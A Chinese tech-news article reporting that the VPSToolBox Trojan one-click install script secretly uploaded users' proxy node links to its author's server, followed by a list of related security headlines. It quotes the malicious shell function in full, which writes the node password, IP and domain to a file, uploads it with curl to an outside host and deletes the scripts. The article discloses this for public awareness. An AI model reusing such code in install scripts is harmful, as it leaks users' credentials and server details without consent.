Trojan 知名一键脚本 VPSToolBox 包含恶意代码

2023-04-01 發表於 开源资讯

V2EX (https://v2ex.com/t/928400) 用户发现 Trojan 一键脚本 VPSToolBox 包含恶意代码,会将用户自建的 Trojan 节点链接上传至远程服务器。

clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}

恶意代码位置:
https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494

据了解,该恶意代码已经存在超过一年时间。曾有用户提出 issue 指出该恶意代码,但被作者直接关闭了 issue。

该作者在2022年4月14日的一次更新中使用了上传 trojan 节点链接的代码,替换了原来加入 netdata 云监控的代码。通过查找其他用户克隆的仓库证实了这一说法。在被曝光后不久,作者删除了项目的 GitHub 仓库 (https://github.com/johnrosen1/vpstoolbox),该项目一共获得了 1.7k 个 star。

相關推薦

CuteBoi:超过 1200 个 NPM 包加入挖矿逻辑

2022-07-09

1200多个包含混淆加密的恶意 NPM,这些包含有相同的挖矿脚本 eazyminer,该脚本的目的是利用如 Database 和 Web 等所在服务器的机器闲置资源进行挖矿。 攻击事件分析 攻击手法 CuteBoi 主要依赖 mail.tm 提供的一次性电子邮件服务和

被呼吁抵制,7-Zip 伪开源还留有后门?网友:无稽之谈

2022-06-30

一位名为 Paul 的作者发布了一篇呼吁抵制知名压缩软件 7-Zip 的文章。7-Zip 是一个由俄罗斯开发者 Igor Pavlov 开发,发布于 1999 年的老牌软件,其源码托管在 Sourceforge;大部分的源码都适用于 GNU LGPL 许可,unRAR 代码则采用的是 GNU L

开源代码扫描工具 Socket 获融资 2000 万美元

2023-08-03

领投,跟投的包括 Abstract Ventures 和 Michael Ovitz,以及众多知名天使投资人 Box(Aaron Levie)、Figma(Dylan Field)、Okta(Frederic Kerrest)、Vercel(Guillermo Rauch)和 Eventbrite(Julia 和 Kevin Hartz)的联合创始人等。 Socket 是一家提供扫描工

你的 VS Code 扩展值得信赖吗?

2023-01-11

用。以及采取了一些措施来防止名称抢注,即名称故意与知名名称相似。开发人员还可以观察扩展是否有蓝勾,该标识意味着发布者已经验证了一个 web 域名的所有权(有些正版扩展也并没有进行验证,如 Prettier 等)。 Marketpl

周下载量百万的 node-ipc 包以反战为名进行供应链投毒

2022-03-16

名进行供应链投毒,该包在 npm 每周有上百万下载量。 知名技术网站 V2ex 的一条爆出了这个问题,用户  在使用 npm 构建前端项目时,启动项目后桌面自动创建了一个《 WITH-LOVE-FROM-AMERICA.txt 》文件,点开之后发现内容是空的。

杀毒软件 Avast 收购知名浏览器扩展

2022-09-17

司,该公司的主要产品就是同名的杀毒软件,去年另一家知名的安全软件公司诺顿表示正在与 Avast 进行合并谈判,两家公司已于本月正式完成了合并。 「I don't care about cookies」的开发者近日在官方网站上发布消息表示,他已经

微软将在 Windows 中弃用 VBScript

2023-10-12

布弃用 VBScript,并计划在未来的 Windows 版本中逐步淘汰该脚本语言。“VBScript 在从操作系统中移除之前,将作为按需功能提供。” 按需功能是 Windows 操作系统中的可选功能,如 .NET Framework(.NetFx3)、Hyper-V 和 Windows Subsystem for Li

基于 Go 的僵尸网络活动 Zerobot,整合了对 21 个漏洞的利用

2022-12-10

洞的利用,并利用这些漏洞获得对设备的访问;然后下载脚本以进一步传播。它使用文件名"zero,"进行保存,这也是其命名的由来。影响范围涵盖 F5 BIG-IP、Zyxel 防火墙、Totolink 和 D-Link 路由器以及 Hikvision cameras 等。除了一些物联

ClamAV 0.103.8、0.105.2 和 1.0.1 补丁版本发布

2023-02-17

更改使用户能够修复镜像以及用于发布和更新镜像的支持脚本的问题,而无需直接向 ClamAV 发布分支中的文件提交更改。 ​​​​​​​https://github.com/Cisco-Talos/clamav/pull/765 将 vendored libmspack 库更新到 0.11alpha 版。

开发近 20 年后,开源反病毒引擎 ClamAV 1.0 发布

2022-12-02

TomsFastMath 库构建的选项已被删除 将 Docker 文件和支持脚本从 ClamAV 主仓库移到了一个新仓库:https://github.com/Cisco-Talos/clamav-docker 由于 0.103 LTS 版本和 1.0 LTS 版本之间的 ABI 变化,增加了 libclamav 的 SONAME 主要版本。 其他改进

Apache HTTP Server 多个漏洞风险通告 严重漏洞影响上亿个网站

2021-12-24

意代码执行 简述: 由于在 mod_lua 多部分解析器(从 Lua 脚本调用的 r:parsebody())中出现边界错误,因此远程攻击者可发送恶意构造的HTTP请求,可导致缓冲区溢出,进而可在目标服务器上执行任意代码。但该模块默认不启用,未

谷歌通过新的开发策略,以提升 3000% Android 的安全性

2022-04-12

积极开发的项目推向 Play Store 之外,从而导致用户转向不知名来源获取想要的应用程序的 APK,加大感染恶意软件风险。 Accessibility API 滥用 Android 的 Accessibility API 允许开发人员创建可供残障人士使用的应用程序,从而允许创建不

OSCS开源软件安全周报,一分钟了解本周开源软件安全大事

2022-08-09

了恶意代码,感染文件超过3.5万,涉及 Go 代码、NPM 安装脚本、容器镜像配置等内容。 https://mp.weixin.qq.com/s/4exLDOlayWm_o60zxn1Srw 其他资讯 通过 SSH 蛮力攻击针对 Linux 服务器的新 IoT RapperBot 恶意软件 https://thehackernews.com/2022/08

Android 恶意软件渗透 60 个 Google Play 应用,安装量达 1 亿

2023-04-18

来进行广告欺诈。 目前,研究团队已经发现了超过 60 个包含该第三方恶意库的应用程序,在 Google Play 应用市场上跟踪到的下载量已超过了 1 亿次,其次是韩国的应用商店 ONE store,安装量约为 800 万。 一些受影响的应用程序包

熱門推薦